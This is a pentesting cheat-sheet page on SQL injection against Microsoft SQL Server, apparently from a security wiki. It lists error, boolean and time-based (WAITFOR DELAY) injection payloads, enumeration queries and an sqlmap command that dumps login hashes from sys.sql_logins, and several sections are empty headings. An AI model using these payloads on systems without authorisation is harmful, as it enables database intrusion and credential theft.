MSSQL.md

Microsoft SQL Server is a relational database management system developed by Microsoft. Microsoft markets a dozen different editions of Microsoft SQL Server with various functionalities and aims. A list of the versions is available : https://support.microsoft.com/en-us/help/321185/how-to-determine-the-version-edition-and-update-level-of-sql-server-an

MSSQL supports stacked queries.

Vulnerable parameters detection

Injection locations

In a HTTP request there are a few possible injection points :

URL parameters
POST parameters
Cookie names and values
Host header and any custom headers

Note that while the entry points above are the most common, any content in an HTTP request can be prone to SQL injection.

Injection detection

Detecting vulnerable parameters is most easily done by triggering errors and boolean logic within the application. Supplying malformed queries will trigger errors and sending valid queries with various boolean logic statements may trigger different responses from the web server. Time based payload can also be used to detect SQL injection in MSSQL.

Technique Queries

Technique	Queries
Error A direct message can be returned or the page may act differently	`x='` `x=''` `x="` `x=""` `x=\` `x=\\` `x=\'` `...`
Boolean Testing Page can react differently if true or false	`x=1 or 1=1 -- true` `x=1' or 1=1 -- true` `x=1" or 1=1 -- true` `x=1 or 1=2 -- false` `...`
Time Based A delay can be induced by the query execution	`x=1 WAITFOR DELAY '0:0:5' -- Wait 5 seconds` `x=1; WAITFOR DELAY '0:0:5' -- Wait 5 seconds` `x=1 WAITFOR TIME '22:42' -- Wait until 22:42` `...`

Error A direct message can be returned or the page may act differently

x=' x='' x=" x="" x=\ x=\\ x=\' ...

Boolean Testing Page can react differently if true or false

x=1 or 1=1 -- true x=1' or 1=1 -- true x=1" or 1=1 -- true x=1 or 1=2 -- false ...

Time Based A delay can be induced by the query execution

x=1 WAITFOR DELAY '0:0:5' -- Wait 5 seconds x=1; WAITFOR DELAY '0:0:5' -- Wait 5 seconds x=1 WAITFOR TIME '22:42' -- Wait until 22:42 ...

Automated detection

The detection of vulnerable parameters can be automated, using the BurpSuite Pro scanner or sqlmap for example.

Note that second order SQL injection, which arises when user-supplied data is first stored by the application and then later incorporated into SQL queries in an unsafe manners, may not be properly detected by automatic tools.

Databases dumping

Description Queries

Description	Queries
Comments
Encoding queries
Obfuscating queries
Disable logging mechanisms
MSSQL version
Current user	`SELECT (CAST(SYSTEM_USER AS NVARCHAR(4000)))`
Users and privileges
Users' passwords	Using `sqlmap`: `sqlmap -D master -T sys.sql_logins --dump [...]`
Databases
Current database	`SELECT (CAST(DB_NAME() AS NVARCHAR(4000)))`
Tables
Columns
Data

Comments

Encoding queries

Obfuscating queries

Disable logging mechanisms

MSSQL version

Current user

SELECT (CAST(SYSTEM_USER AS NVARCHAR(4000)))

Users and privileges

Users' passwords

Using sqlmap: sqlmap -D master -T sys.sql_logins --dump [...]

Databases

Current database

SELECT (CAST(DB_NAME() AS NVARCHAR(4000)))

Tables

Columns

Data

References

https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/ https://www.asafety.fr/mssql-injection-cheat-sheet http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet

PreviousSQLMAP.md NextMySQL.md

Last updated 2 years ago